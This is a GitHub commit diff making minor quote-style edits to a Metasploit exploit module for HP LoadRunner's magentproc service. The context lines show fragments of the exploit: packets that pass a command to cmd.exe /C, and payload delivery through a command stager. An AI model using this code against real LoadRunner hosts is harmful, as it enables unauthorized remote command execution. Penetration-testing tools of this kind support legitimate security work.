Skip to content

Commit 4dacc70

Browse files
committed
slight updates to magentproc docs
1 parent b698095 commit 4dacc70

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed

modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,7 @@ def initialize(info={})
4444
],
4545
'Privileged' => false,
4646
'Stance' => Msf::Exploit::Stance::Aggressive,
47-
'DisclosureDate' => "May 06 2010",
47+
'DisclosureDate' => 'May 06 2010',
4848
'DefaultTarget' => 0))
4949

5050
register_options([Opt::RPORT(54345)])
@@ -64,7 +64,7 @@ def execute_command(cmd, _opts = {})
6464
cmd1 = "C:\\Windows\\system32\\cmd.exe"
6565
cmd2 = "/C \"#{cmd}\""
6666

67-
pkt1 = [0x19].pack('N') + guid + "0"
67+
pkt1 = [0x19].pack('N') + guid + '0'
6868

6969
pkt2 = [0x6].pack('N') + [0x0].pack('N') + "(-server_type=8)(-server_name=#{server_name})(-server_full_name=#{server_name})"
7070
pkt2 << "(-server_ip_name=#{server_ip})(-server_port=#{server_port})(-server_fd_secondary=4)(-guid_identifier=#{guid})\x00\x00"
@@ -93,7 +93,7 @@ def execute_command(cmd, _opts = {})
9393
end
9494

9595
def exploit
96-
print_status("Sending payload...")
96+
print_status('Sending payload...')
9797
execute_cmdstager(linemax: 1500)
9898
end
9999
end

0 commit comments

Comments
 (0)